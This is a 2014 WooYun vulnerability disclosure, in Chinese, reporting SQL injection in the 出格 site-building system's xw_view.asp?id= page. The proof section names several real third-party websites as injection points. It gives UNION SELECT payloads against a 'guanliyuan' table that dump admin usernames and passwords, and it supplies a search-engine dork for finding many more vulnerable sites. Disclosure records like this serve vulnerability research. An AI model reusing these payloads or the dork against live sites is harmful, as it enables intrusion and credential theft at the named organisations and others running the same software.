漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-071818
漏洞标题:出格建站系统存在注入页面
相关厂商:出格建站系统
漏洞作者: geegirl
提交时间:2014-08-11 13:01
修复时间:2014-09-25 13:02
公开时间:2014-09-25 13:02
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:7
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-08-11: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-09-25: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
出格建站系统存在注入页面
详细说明:
出格建站在http://www.url.com/xw_view.asp?id=xxx页面存在注入。部分网站是以http://www.url.com/xw_view.asp?id=xxx&xxxxxxxx的形式存在,只需将&xxxx删去即可注入。由于该建站系统不开源(收费还这么不负责),没有漏洞源码,但在谷歌,度娘 搜inurl:xw_view.asp?id= 即可找到大量注入点,且基本为出格建站。。
出格建站官网 http://www.chuge8.com/
漏洞证明:
例如 注入点www.youcai58.com/xw_view.asp?id=400 优才教育网
加 ’ and 1=2 报错
提交 http://www.youcai58.com/xw_view.asp?id=400%20union%20select%201,2,3,4,....,39%20from%20guanliyuan
提交 http://www.youcai58.com/xw_view.asp?id=400%20union%20select%
201,mm,yhm,4,......,39%20from%20guanliyuan 爆出 密码 账号
注入点www.ufgzzd.com/xw_view.asp?id=54&dbid=s2 去除&...
www.ufgzzd.com/xw_view.asp?id=54
提交 ' and 1=2 报错
跑....
还有注入点 http://www.gjysds.com/xw_view.asp?id=70 世界青少年文化艺术教育联盟
....很多不说了
修复方案:
这个你们更专业
版权声明:转载请注明来源 geegirl@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝